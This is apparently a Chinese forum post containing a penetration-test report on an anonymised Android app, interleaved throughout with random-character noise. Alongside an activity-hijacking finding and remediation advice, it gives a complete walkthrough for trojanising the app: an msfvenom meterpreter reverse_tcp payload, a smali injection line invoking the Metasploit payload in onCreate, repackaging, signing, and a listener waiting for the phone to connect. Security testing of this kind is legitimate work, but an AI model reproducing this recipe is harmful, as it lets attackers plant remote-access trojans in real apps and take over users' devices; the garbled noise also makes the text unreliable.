( b3 Y4 I9 a( F+ G) X ( b3 L$ C6 N8 Q0 e 1-2 测试结果 ' o! H& u6 g' F2 O6 ]# G! S 4 `9 d( G4 N1 V! ] D- Z, [' ~+ B

3 j) j: u" q l) e9 k- \ 8 j G' {! X( u' L( M. [

9 X7 g/ \6 S" N8 u4 S3 k / Z" ^. s5 i* N6 ~% c" x   ; h8 a) b) S5 ^+ W: I6 _+ Q1 M% l9 y3 I

* L2 j a n9 p. C1 C + l. i) D/ U8 O" _

R7 O l" s! U6 a" u y) }. I! C 1 J) x7 a; \+ O- H 2 检测结果                    / `: k' Y/ `$ v# a/ ~; ^& V% z8 S5 E4 x

0 R! Y3 ]3 \) w6 d3 Z W4 n( |/ I6 N0 a- e8 p. _, U

! Z8 c; Z$ ?( f# v; F+ x+ l / V1 T9 ?! @5 Y1 A' p9 \+ n 2.1 某某某 5 j8 B7 V6 h/ S: {: b3 G- P `* G2 ?

7 k. a( X2 K. W ?$ M7 k 2 p+ r a& d8 z; A; z$ N* @" s% j D

+ c! `( }5 n0 d+ v! p4 T 5 l" R- b/ ?3 I, ~! S) f+ d3 n 2.1.1检测目标 8 o' Q8 g9 \ f 9 A2 Z' q- Z: [ ?/ z# D! v' Q5 V

( a9 i' ?' {" J' C+ e* k% R) o ( E P6 f8 { m) B6 r- a5 a

( n& o' O6 o) A) p: a8 a ! z& [) k) j: `% p, E' I+ T# Z 目标地址: 某某某某某某APP / a* G' [; {0 a E, D* r( R% G; ?! ]" Y

5 K) I0 x$ h& `0 z- `6 g- j0 j ' z7 L8 }0 \# Z" r

, z8 l! ]5 W" R5 M. G* s) N+ Y1 t 2 [* o. K, W% S9 B# J3 `4 M8 R 2.1.2检测结果 * w L1 @! O, |/ Q 0 N: L& p; g# Z: b

6 _% J- p! r( E7 z* \7 n 1 ]( B* }$ q0 H7 M6 H

, Q" F3 q6 c; ]6 r% R, D , p1 u# }- E1 h; g: m' B5 H 2.1.2.1 1 F+ b" W* z m; v! s! E- x9 Y) \0 K% V$ o" c2 o( [& ^' c

. Y9 J4 n& [# u Z8 a$ L% z , v+ z& K: l& u4 f( [" i& k3 t

9 F5 c- B+ K2 O& N7 {( T6 Q: d 3 |, U# C S: O6 ^: D8 [2 X' p 漏洞链接地址:某某某某某某APP 0 ^/ l# p% r! [# }: h: l: p: S$ N0 J6 y

3 ^/ D7 u$ D4 W) K0 M# ^. x- V* f/ M* K7 t- o

. e2 v, P7 y7 D$ e E ' [: F8 l4 ?; i. D   6 t, s! v6 L9 W7 C5 _9 J/ m% Q0 G/ w5 `% ~

0 U! o' o8 r* ]! J: F: i/ N 8 V8 G1 j9 N/ a; S2 u9 ?+ |9 x# e

% E3 w2 g% {; c/ c, Z # W; \* J% G- I7 U" C" G# ] 漏洞分析及取证: " q8 j% k5 m4 }" J6 J' f) t: ?$ ~' V3 c5 J9 F" ]9 u' V) _. z

! G" n' W* N2 ~$ x8 S; b$ X3 x ) `0 x; }+ ] |" b3 k

5 V( m: p. L; k& B7 K" L! R+ p' X! P( w! U( S                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 9 ]5 @: D% E" d; ^; w {; w+ Y- T' O# t9 n0 r8 I" {4 [9 k$ a

6 ~+ l( d! C7 |, J( B ]$ D& M; O6 [/ ^" S; |

: i- e! u( V# v8 L$ U. N3 t$ m, ~5 q      8 F2 a3 F- c. F Q" {/ B ( ^9 a ?3 C7 C: j& D) ~6 q

) B. Y! h& C7 C( _0 ~& \1 m7 R . C) i7 z: Q5 Q, f! z. i

5 G. w7 Q& P5 f6 e3 A4 ?* ?9 C4 p( {, j$ A                       ( Y+ l; Y+ }3 T8 X& i2 r & e0 F4 |- k# r2 h- F

5 y% q8 r! m q8 x5 S : [; L6 O% e2 W A- c

+ `. O( w! A% e 0 `3 y- p: R7 H+ o5 U 5 a' s: ~* x% o8 P0 C. w( y8 c* `

+ q' \4 S9 [7 b- T ' w9 x" ^7 m' m

( h2 R6 K; t- ]3 `5 R$ |% p3 u9 w+ b( }( L) o% Q! c" x% z- h3 ] * z( {+ L: M$ y6 E V$ [% e . w8 ~7 C q; X( X9 r

" H' J' `6 O0 Q! d9 ] : L! J* k* M. F. K9 Y3 F6 h

' m/ M: b$ [1 C: |- C ' `1 F' y! x8 P6 w. ~' ~7 L: p2 C) v' I $ I5 z. g3 n( a2 @4 u z% I+ M$ }8 L$ q4 g a5 x2 `

4 c& b$ ^% t( t( ? # I" v; {/ Y* o: P( K5 C

+ t1 G* o: w% _" e& \/ _ 7 C+ m ]( O/ H g( K 漏洞危害:高 5 N; B' D) w/ [6 A* L3 g( t . n9 N. q% ?8 j9 s- ~3 b6 ~0 i/ ~

( R$ [! W8 I" s- C( n3 z" P- ?& C @ y+ f9 S) ^0 {! ]7 K# ^
7 ]6 Q3 R: z: F" C+ S: J/ l5 c $ f, v j3 {8 b2 e1 [ ; G, f* ]9 P. @6 o, J; _* Z5 q7 B' ?% m, g: T; u0 Y) ^6 s% \, K3 x( p3 `# [/ k& t* w% t, b( ~+ o7 T P: d z/ J L y7 J4 [# b# u/ L& n# Y$ p. p* z7 S' V. q! ]1 |" M, o8 a. c7 m( O# S$ e9 a( a7 F+ X+ x/ ^4 m, {$ E+ z( Q2 G/ c& G+ U8 `* W9 z, M6 m z5 d% Q" Y4 E, b G" z( \: b& n! _) f9 d4 y& s o* |- T s/ X3 t: ]+ P: e) m; v& t2 Y3 M! y# `! D* I% D G8 T: Q+ J: |3 b: H' ~3 L! L- ?. J' i& N" B$ _- ^ n0 S5 R1 S v L4 A7 j( I4 ?) v0 O3 q( v9 k) _8 l' F" [, Q$ N1 z9 g, w" Y6 _/ }# ?& B* X* H$ |: k! o. p4 M& b1 y5 M" s" v: M' C3 z5 Z, R* r+ b1 q0 d7 j. ~
( K; P0 `5 ]! d & X7 V h9 D6 K

, w" }1 P$ V, B8 f7 M8 p+ j4 n& D, O+ o0 {. b. i) D* X* j 严重程度 * p; z3 l- g8 B; { * h d( X5 i5 r8 _3 o

7 c- h4 w) P! p- v' } 0 c1 X+ s% _' A
# `; ?( L5 d0 J0 x6 N" K# m ! s1 w& q6 f2 ]1 @0 P% \8 N. G5 x+ j

( |5 O8 b) X: H! y. c1 p0 a" f3 C - Q) o2 D5 M3 O4 Z( q. d# G% A 4 o9 _# t, H) l/ D! s( u7 h ( G P; g- ^- K* [ T

5 G( L# D8 l: e; a; P" h $ z% f# A2 K8 y- i8 s
6 J7 ?, T3 D( a% C' X% f ; n* c4 A0 h$ N0 R8 _+ B7 X6 I6 V& t

5 L# l! P% u* ~9 Y7 i , z/ K# T! e9 R9 K5 V 7 T( j; h' d8 G0 ?) U! Q7 O9 R7 O' N' P7 o/ |( B

8 F2 Q L- S, i% Z& T' [8 U5 x + @3 v, I9 D1 o' l1 J5 o" P" t, f
2 M, T2 y9 i3 P4 Q3 D- b5 H# b. y8 @ O# R7 @& H5 E' j

' R5 k8 X6 x" {7 L ! X ?7 r: k, b8 O+ w; \ 9 f& x% t# ?5 }: N% N: v ] 3 A) f! W5 E2 `) L% X9 W# r

: B9 j( W3 u! K( | ! E! T+ y. d0 E @* B
. c* R( u; {% Y$ P; f, l 9 Q) b% J) i6 {. Q5 y

& x! J& P7 }6 A8 q$ P! ]4 L- j; W 9 n: v# k8 ], r   ) B' ^) |: N3 N. \" ?6 ^; r0 X I) [5 X3 s' y

$ D7 T# ]( v3 b. M5 {5 \/ y+ O: a , m5 y( a5 L6 v' O2 N
, O( `! |. N5 I3 C& ?1 a [$ {! Q- {6 I # {; U- D) k' B. S: G4 o. l7 E% }

' Q7 f) u# I$ ^# E 0 T, ?7 v. H" s4 D$ k2 q 7 @9 R, Z: ?& o" e3 L0 R: b 6 C* Z/ V, e d! F

% {/ `1 G* S& G, `! ~' \7 k! C ; a5 d1 L1 e% Z/ X# U$ ?1 y5 |
: y0 k# h6 \" u9 l. u" u) d% ]6 f , D( G; B( a6 ]

( H7 B7 |. Z5 R* [ 4 ^" y' J5 S x8 w+ `2 {   " j4 p6 b% A; g+ K5 c# j. q$ T: B( l# c

7 c. y3 G, t$ @3 k8 u8 z6 j, Y6 [) T5 i3 I0 A5 D
! M' C4 o. q5 g# }5 D0 H 9 D3 N5 `9 O' j
4 D8 e" ~3 n" G& ` ) m! a0 y6 `; r, M6 L

; H+ k6 W1 r! Y: y , `5 F$ T- X, F$ ^   & v/ c8 C% Q: t& O / o0 d) |- j% o, `" Y3 }

+ S0 {* o: ^* l* `0 v* f8 K: s8 m

! }7 z( m. l! q: X( @ { 6 | [1 F+ @$ n 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 , [) B9 t* e0 Z4 F( Z+ X3 Y& F: H& U: {7 c+ o( X9 }

$ p+ p3 C7 K3 Z+ T8 b. S& r( O1 X( T( r H; O0 `# q

( \4 B6 f, D. V' q7 h / A. Z9 P+ ?$ B           # R( L, a# y3 h; V; x5 {4 o- H% Y2 c6 m6 P0 R4 b

7 E% \9 L+ w6 w. f% P- W7 K & w) f$ N/ F2 o3 d

6 ?+ \* g! X: I m/ k Z; z* j/ U3 Q' l5 H6 W   3 f' E$ ?+ V; k 9 a% D j5 {% R4 @

( s. z( g+ q5 u: ] H ; k: Y5 r, g4 `

+ N7 `' @3 [3 a % r$ c, S8 N; n. c, N, n; q/ L! _ 2.1.2.2 4 Z3 E: f* R# M9 ]& A8 c6 t % u e& C* B9 v2 I) w% p$ W. v

+ Y7 n& [- V8 a* p / B7 }& y1 E' }- b

# Y/ q. J1 H: U/ G& s % T" Y9 h: }8 X( U. p) g 漏洞链接地址:某某某某某某APP 2 }$ ?4 ]" \6 _1 y9 X $ n5 h9 B$ \7 w) i# H

7 R I" o6 v' J0 x( F 6 A& F( a+ B$ r, s' i

7 \. j4 x6 u$ s$ N. ^9 w4 G3 S2 J$ c6 p 漏洞分析及取证: + @2 L2 G" V6 f* m, w0 d) x0 ^8 T% z4 Z' w

! R% j$ c& H$ U; }" `, K , E* M! g3 i/ V9 \3 `

" v7 T8 f1 I5 z6 y# ^ ; V" e8 D, n+ O( W                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: / B0 c& Y% h" c3 e 6 h+ g6 [ @( b; G; C, L

2 @. m+ ~4 D% W9 V ( X# _- b* N( w" Y$ i5 ~' Q

/ y! ?* F4 i; a* D/ \. I 4 a$ f+ A4 ?) p" G( f: ? Metasploit 生成木马 apk : n7 [$ b( W. ^0 F& W( L: H 0 J6 X# L( z. z4 @- ?( k+ ^1 Y

/ l4 v0 B& D4 W% |* Q# K, y& a0 O" l" t' m" O! z% C

( h: O" D. }: Z" W 2 H& \# p) E: O5 F, X9 P msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 K# ^% n; b% q* I5 u) S7 O T/ J }" s% ^

$ I4 {" a' J7 R; Y, D' _3 l. h; @3 \7 W9 _! x

0 s+ A" H6 S1 X m: E 6 ~9 _! d" v4 u+ U 反编译目标apk和木马apk + t2 r7 \. v8 y9 J; a! ?8 r 6 v/ Z+ r. z, o% _% T Q/ b

% v0 Z. ^3 A) P1 c& s $ c# P8 m' {* X4 }9 T! g

) n9 n+ D# \# w3 a ! z: a1 I5 A% e# I! v; h) z% `8 Y7 v apktool d target.apk
1 o0 k. Z4 x5 j$ l. n u 3 x( R4 y$ }+ ]. _/ x apktool d cockhorse.apk
' `, U% b; s% z - s; s9 o& ` Q' e* Q1 x& G

: O, x% N( z- i4 b8 s. {# t3 ^0 a ) D% w8 r& h) Z; v- c# k

2 ]- ~! N s/ C4 ] 1 U( E6 g$ a8 H) [ 木马 apk 注入目标 apk & ?# j o/ C" o4 a6 C; w4 U; u7 m% F6 N

4 Q$ Y1 K* D7 i* f ( Q5 e# O9 R9 f x- T

`9 Y+ q8 B1 l: p9 ~9 @ 8 ?3 B, e" l: v' b2 D; O, g _6 C 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
, R: c) g, G+ J - s( w" t, d0 t invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
: q! ?$ _* ~$ f3 ^9 p3 m, i) ~* ?7 u* p+ P, Y) p& _5 J+ I

2 n/ P* w c( i8 U$ E. g 4 W9 G0 z+ d8 E6 y

1 [8 B7 e' y6 g" y : E7 ]7 i/ E$ Q7 f4 R, K* } `8 A 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 6 g/ v: q5 D" K E % C, W- O0 H0 ]( h

# o$ D6 G6 h+ D$ C+ p t8 y3 k. s7 Y, \. `$ _+ v6 ^. E

- E% E8 b# v" y( J& ]# I + i+ e2 r1 J/ f% w: r, u! S5 f 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 3 Q) K P8 @. N 1 _9 M7 V5 q% H/ Q. F- k& a/ @

$ t9 N! Q# R+ F3 a7 r8 ^ ' a, q! u2 Q2 @! B2 E

' ~/ x$ I: I, [ % N2 g$ I- G* \- x& e; A& q% ]6 U# y 回编译生成最终 apk 1 v6 n& _9 |1 F 7 G' ]$ [7 F& f

! K* A( }& ?- D $ a/ R: h6 U" s9 ]9 }

1 C X$ v$ i, a7 K! J' p 0 f6 L; u2 u k2 U( U& ^ 重新打包 # I# V. K; t. a- s/ a8 y, ^ ! x0 P5 h6 u, F% `. Y

6 ~( i" U: O+ C& t; d( `! I . Z, o6 K) Q2 G1 U$ D* }: P+ \

& x, ~# _8 U" A7 \1 O5 e1 S$ |+ B( X4 g " }) r& s$ D& Z8 E# a8 R+ U* t apktool b -o repackage.apk target_app_floder : a$ p+ ~8 P) w( g( W ; H+ \ @$ n2 I- I: X1 J4 `( J: i0 t1 t

" c' Y8 B. } ^, |! j3 j2 z# a X' X' g0 A7 D8 C

1 ?- r6 c& q5 j & U5 I: `0 W5 s& v5 l- D 创建签名文件,有的话可忽略此步骤 / y) ?7 b2 A7 ] h5 ?( F7 e ; F0 K3 z% o; R6 R; ]2 n

_, U& t6 g# w" |9 Q( g2 V1 B, w6 s; a5 E' X- e5 ^

" [: Y+ g @5 w6 P9 L ) j7 \7 o6 m0 E; w N8 H keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                . r, y1 ~# [6 X, E X) _ 2 Z1 d6 q* p9 z, t% f0 H+ _* s

& t, z. n/ ]. I8 e3 @0 O( n! W1 ^ l% K P2 P

" Q$ g' q3 L; }/ @& `- r2 [ ' l, p7 r7 E x7 y 签名,以下任选其一 & i% N3 G; h" h$ Z7 M8 Y 6 L4 r/ w/ o4 s: f% N

6 R) s0 ]3 V0 p A$ m" m4 m$ M3 F0 K! L: W; ]

) W D3 h4 I9 U2 {5 c _- Y, B0 Z7 L& E jarsigner 方式 : s8 n; N, i+ h* e# d# V/ Y9 O : A. D' N0 O" l2 W7 w

. \( V, w6 o/ R2 g, n) n) J6 Z# K" Y; I! ^

, i( P. Z# J, z ( A6 ]9 U! i9 f& g( Y+ a. g& g jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 5 I2 A9 n3 n! K% R4 b/ H3 {, S" n' K, A; [& i+ ^7 _, h6 O

9 l3 N& W2 u% a" K, B* N + J4 U8 `4 J( W2 s5 R

+ N( k; y ?8 H. H* i; q; K1 e- [8 `1 Z. [ apksigner 方式 / Q1 x$ V, `3 c- F7 L M- ` 2 D o# g6 Z i1 k

- L: h% m! A( g7 _. f3 d% ^ ) b% c0 `; r: }" a3 |

. s: r# g( u/ v* X7 n2 B9 `" A , v0 k% \0 b: d+ E% e" M: Y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 6 {& R! J4 w! @$ m& o 9 ?5 |- a) ]4 Q6 c. j% d

+ f7 D8 `: F" Y. w) D + _" L: G3 Z" O6 S7 H* t

7 l4 m) \2 @. K& y. [" R8 U 3 L5 p& @% d& n# O: B8 q 如需要禁用 v2签名 添加选项--v2-signing-enabled false - [: T0 s: w8 D' K0 W( j s, \! L1 ~8 ~4 \5 _2 v1 N! f

+ G {8 P& w9 D- H6 ]+ y1 q: Y 7 @ T) H1 A0 E2 o) b9 { m

, `8 z l8 K5 }5 h9 [; H& t" _* S+ d 验证,以下任选其一 ! y4 V2 q, v( T. E( V8 H |" ^1 `! K; D! b# e6 R2 x

D0 J$ l: y& S' m" E& B4 [, d" x $ d6 w2 w) f5 E0 s: G3 A) T) [

3 S& t# T$ W9 r $ v0 s3 T1 ?( } Q4 @* e. }. b9 M jarsigner方式 3 E; A$ U. q2 f, _$ f * N0 X, {, ?) _# L# `! d

. T7 `. q: C' R: {) B! D % ]0 v' J5 a& c3 Z: T4 {

6 l% y2 A; p2 B6 Z; `8 V. U2 \+ C3 M. q9 U jarsigner -verify repackaged.apk # i, b) k$ c2 K- |/ E, Z \ 2 {) ?! }( a' f" J, V/ b

+ Q6 o4 E5 u1 ?2 g 3 P0 C2 Z0 ~2 S1 p0 u* x

5 l( D+ N8 p& r8 |7 U! T3 i- y, g ; ]( e* G/ C/ H apksigner 方式 # v% {' r7 e$ R+ S. D5 a* N2 |2 P$ Z2 |* Z6 h

D2 \/ W; `8 ?; h; b; K+ H( | ) o7 q' ?0 C. k9 v% x, Z6 N* V& g

, n2 U! ^/ f; a- Z ) \4 b) D9 G$ [- c+ l, j% q9 F apksigner verify -v --print-certs repackaged.apk ) c& m& S' u8 j; g7 H$ j 8 Q U) a; l7 R/ J

% f+ e/ `- W$ f! t, F0 [! o + f; w& w4 T% l Y

# {' i( n; c% x0 P/ Q* ~, ?* ]& V3 K2 B4 K! l7 g0 e9 X keytool方式 : _# Y) }+ B# e 0 ]% v) I2 w6 |" k1 Z

G& v+ U# y7 O$ l2 C2 q$ i 5 B0 U/ S- Z0 A% I, S% d

/ a- i. k, `9 `4 o$ h! v3 j; G 6 n0 R! |; E& b) Y keytool -printcert -jarfile repackaged.apk % G5 P( p3 Z1 s! Y3 l 8 {" k q: u+ k6 F

# b9 i! }& t2 d4 Y2 d( M( o2 w 8 a5 w" ^- y; g

: u) V2 w% N0 i) `4 k- }3 n. O" ?& G : v' D: \# U7 M2 |0 K+ U 对齐 5 h5 t/ K1 m6 j+ o2 W' p+ E 7 i" V5 I. H9 M, D- @

. d0 n& t J$ C( {/ O2 u9 s , |$ O1 C; H9 B- D+ Q

2 c4 {# u5 y& H1 C* w. ] . G2 a- x' |3 a3 U0 A0 A! x 字节对齐优化 {- I {3 T9 Z G8 p # T1 _& N2 o1 S

) E4 r& w. x! t. E8 k1 _ 3 b1 b' g& g5 j

$ C. M4 x* z1 h) O3 I- V( e0 H 9 l9 T, W! Y3 O8 n zipalign -v 4 repackaged.apk final.apk * m* I; w8 ^: j: N4 m: A' g9 ^ $ ]1 z+ D( ~* h* i; h X, d

/ k6 a8 R$ T! X4 w2 U! P, j 9 a8 [9 |. F; R4 H) ?

, }& A3 s4 L* B; X 3 T; J+ K, |- J# q2 p( j. L 检查是否对齐 3 M% G8 b; K: X" B% v$ Z6 m + N, M" ~0 E6 c3 I% R& k

( B' r& b, g; {7 q |# P; s [) p9 R 4 G& I( p' ~8 b5 }3 c( ]/ B3 g

& r3 [; R ?4 C! s & n5 B( `5 l: k" G) h( t zipalign -c -v 4 final.apk . J: [0 \; g. n J 5 G; x+ e: }; K \5 `$ Z

" ]: e8 P- K1 ]3 ?; u % _. ~4 `& V& h. W/ h: l. w/ k

4 E* G( d8 E/ X 9 I/ n b7 A% p" \4 V* O 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 . _$ K; ^' \2 n" Q9 A: v: R 1 D- N! E1 H' W1 k6 P4 r% r9 k; k

8 ?- j$ T2 s+ W# Y& f! a2 N: }. s8 v& r; i( H! g2 x0 ~

- @: _" M$ p9 p/ O8 x ( A. q8 N- b" g$ K# [* `; Y; k 启动Metasploit控制台,配置参数等待上线 0 H0 y* }2 H8 M% I$ a2 { 7 ]# v$ ~/ V1 {9 W; u( E; b/ \. B u

( s# {8 e( w; l9 b8 }$ ~( G. P . J! s7 ^. N! B: q7 H

6 `; I5 M ~" q: q- M; Q) W ' k- M2 `9 [9 m6 B 在终端依次输入如下命令 , i; r% u9 b. g & L! ^- b/ `; V

- O m# |0 m$ v1 x* q' l 9 Y& U& _" \2 I; _

- d; ~* i# _1 n5 E ] * F8 Q% O# Y. b msfconsole 8 x6 @" k* E# m7 j# Z. q6 [. Y3 i0 X 3 I3 p/ }: U; U- ?

; b9 f. _: j8 O0 t t& ? $ u# v R% u" Q2 F- ^$ x& Z

+ ?4 d; j, A& \, q* z4 `7 ]% `% M0 q9 L use exploit/multi/handler 6 v* N+ M. C/ }1 _* R- O6 s* o / y( }+ U0 E+ G# Y

* x! ^3 u3 {/ C% E' T5 u6 n 4 x9 ?& M9 p# U p* u& h

. Y1 d M. X( C5 `. X: P) U, M% _4 ?5 G7 x set PAYLOAD android/meterpreter/reverse_tcp " G. X- Y) J( |7 }& d : M. |0 W) J3 j- R4 X9 p- ^/ ^

' m V' u) o4 J- s7 @+ `' L $ i0 V, R4 Y+ W

; D. p0 ~; q3 F* h1 ?$ d N6 E8 ^0 E2 p# T! d set LHOST 192.xxx.xx.xx ; f5 `( i3 m ~, Y6 z2 h0 T" c2 Q , }1 l2 P; X: {

! H: U! ~+ T# v# C ) M2 X C& v+ c5 E) W: S+ q

7 Z) ~) |1 R3 N- u 4 X- z& Q" }: {1 | set LPORT 4444 5 p5 ^# e$ o/ [ P3 S: t! ?: d ( v. T: t( Q& M9 ~; u) V% y

8 j( | l* }% \4 ?* n% M! Q/ A1 @- ^+ v! _5 R* V& d3 j$ Y

$ o2 S% q7 _ R5 B 3 T2 O% O7 T( \; G5 p$ i exploit 1 }' m( D4 y, B' E ! f. g( d2 E* X

6 o% i, A- S4 i1 f4 Z3 H5 o B7 S7 D& ^0 i% W. H. X! N8 j; c

1 ]( e1 H. @+ ?2 g% a( S( }/ p, A; N3 r 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               , u, N7 H) K$ {4 o; a7 |2 Q - k5 V, y- Z3 [

2 V: Z$ v, k Y. W2 I, k# s$ P) q

& h" X. e9 U: _2 v & a B6 E+ H7 D0 Y6 _6 J; V+ r 漏洞危害:中 # R; q9 {& J: W, Z/ H* k$ N ) T4 H6 |7 I0 w/ p/ j

4 p, P$ ?4 D% g$ S r% S7 t9 h! z V
b+ J0 y. l: T$ f: J1 X3 J; t. j 4 Q& O9 Y+ A' _, {# F% N0 k & [; k6 e( ^9 M; J " r A( w- G& x: A% d, E 4 i) b; k. o p4 c' ]- k- @/ a$ }& ?7 {- f/ R0 T: x, r0 W! b7 N% E0 N% K9 ^$ d U/ H+ l9 o4 `' Q" t& R9 v8 m- r6 O1 ~) |# B% l" C8 ~4 C! C' t' ]) \, ?7 J. E1 i3 L X; _2 n1 D* ]9 [0 @6 v: N4 R Y" }5 u0 B1 j% Z4 g# d+ j6 P! v" O& ^% M0 X8 h2 h6 c2 P8 B" a) ~8 v+ \ `( e0 m' Q9 q, j( z q* I% L0 E1 ~2 R8 j1 o, G, K6 s! A+ `7 v6 F' {- l$ d8 D! z7 N" t( k0 \3 n2 n& x# ?' O# a- s; n7 F! q! a$ J; e+ J3 j$ B) N. K2 O2 B. P% \! i _3 `0 l- A# [+ Z8 f" d4 | N0 _: v0 s1 S R; M( c; x8 ?' {5 w! H8 m0 x2 L# P. A+ Z, r: p8 n! C6 ~5 {; E$ _+ R6 s3 Y8 _
& N! ?, r x# k5 t. c! u' i 6 w- n" L8 N# J

$ z4 m" A# B) {# U" m + C$ c2 P2 i5 e) Q+ A2 D 严重程度 0 q) ^" R) u) b7 {2 p% v# C: D 0 x/ ?0 z9 N5 E0 P# p* { [

1 k, Y1 L8 V- }0 b6 b0 _$ i n8 R. k" P2 U
, [% D0 ]& j, q6 q- M& K# L ( ?2 R) Q. H1 w x5 u8 L$ h7 g# y

; L/ G) ]% u/ h- r! J ; |! G* a3 l3 ~+ I% A 7 Y7 q5 j: } i+ O7 Y4 } ! l8 [& q. a1 Z- }, N* ]6 a1 ?

7 |8 Q7 ~* _7 ~ + C3 d( P8 t: I1 T' H$ n+ C" E
6 I6 Z: Q5 X+ w' U3 N# @ $ E3 u0 w5 V) w5 z2 m

1 R$ g- P# \$ z/ U+ P0 G' ]1 K! C0 K% u2 _- A2 p5 h: o4 X 9 @ O. F# X8 n& L' S; B* F7 e 7 r% C+ R! H. S7 }

- d( W! V4 { F! u0 \' v0 j* | . v: M: W! m8 P/ H3 |
; p0 p8 `! ]" I0 M2 R' M0 u' o, A6 j$ B9 H

8 l7 `' P- ~+ G( A# m* |4 S& G. r6 m+ C" ?- p . G2 t0 w" Y8 @; i, m: ^) m 7 g9 J1 k% K1 c

3 f$ [+ l8 z, }( S) j' N# c a) j " m/ [( G7 a0 U) M
' _/ Z4 q+ E, ~! v. n+ F , s J& e7 B4 Z ; Q2 f0 X2 C# A8 {* s- q ) g! X' j9 p% V$ w8 j

; j8 G0 u }9 t6 Q. F1 h: n 3 R* t$ H' D+ r- ]0 K, B7 r( ^   0 a7 h8 @3 S2 X7 }4 W ! s$ a# H- L- [/ V9 \

% V S. x7 e( j / ?( C! u. J3 O/ W$ a% S
- a! i9 h6 M3 G" F- l3 ?& [& s + j2 P- A! \9 E

9 B1 n" y5 I4 A+ W. ^ 6 {) }9 l/ o% ?6 n# I5 I % `, k5 c6 e3 F1 G + N' { G+ P; e- [9 J; w

- Q1 m$ o2 h2 `; w+ J- \( t9 O0 `( v, U. G, _0 v0 J' C7 ~5 W. G, l+ T4 B
I0 ]; s, N+ [, f" q7 l' q7 s( M3 c" P% } 4 {* @! l# [* ~6 s5 d N % {9 W6 r# [0 l' Y9 @$ g2 q6 V/ A' U

2 l4 e$ X3 z4 Z7 @ . p% r5 ]# B. s1 C; Z   ! h: _( F( V4 k' E7 d" E: p- C7 F f3 Q& i

" a) ~) N# m6 j4 e* ~, f' ? ) p7 a, D: [0 A. ?- A
% ~- x% H# y% e % {$ n% C2 V+ I) C2 T- |$ i
+ S- S& A, X/ I9 G' B8 x$ W' m: I/ o+ Z" ?

6 e& I- \4 r, G4 d# M- Z; k' Z! P2 b" E3 a, w' d   6 p0 h3 ?( C& E0 {" S, }2 q3 L2 F$ d% _5 l5 H4 S3 y- J) u

5 q, |, b( S; D # |0 R; l |: u" p, I3 }7 L

6 g% A1 _/ Y% N+ l5 Y + ? ?" [, D! B8 Z4 p 修复方法: 0 p3 `7 x. [5 W % L$ E- U1 Z: f. W3 p/ ~7 g

% i! u) m5 m; S0 L5 @) Z; z' @' m% W2 X1 }

$ b0 _% W1 l6 L2 U5 V( m0 E0 A9 @- ^ 0 o, c+ S8 I5 A0 @. z5 v9 G               1. APP 启动时应做签名校验防止二次打包。
& k1 w3 i) ?4 }+ M+ _ } 9 L4 _+ f/ o2 e 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! F) K* r# H9 V+ j( h# v* U 0 Y5 q$ U, B, j$ }. L7 v

0 C1 b& V2 ]" \; q/ S3 n+ _4 Z$ b# Q7 f& Q( U, X1 A b $ G7 Z, E! P: M# b 9 {5 W" C# Y3 g. M! V8 p8 t

& W# ^/ H- L* A+ H8 ^ 0 A; z- V0 G% y+ R   7 R" a; |8 @) Q+ _/ }3 Q& I: D# g4 K7 X% z. |

$ q* S0 c" m% C- `0 u+ w; L# j4 T S 7 a8 z+ n9 c+ b: j- f3 m ; F4 w2 r Y0 ~2 d 9 r' f; a* V+ ^3 \- V) N% z

0 \* e S6 V% F, g& ^' }1 p. B0 \4 y7 A: ]' U8 h% K- {
, m/ P1 k* ~4 G 1 X( F3 d& B/ q; M5 @1 X

\. Z1 \& d3 P3 E5 k 0 g- |2 j- \8 M& P) h# a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表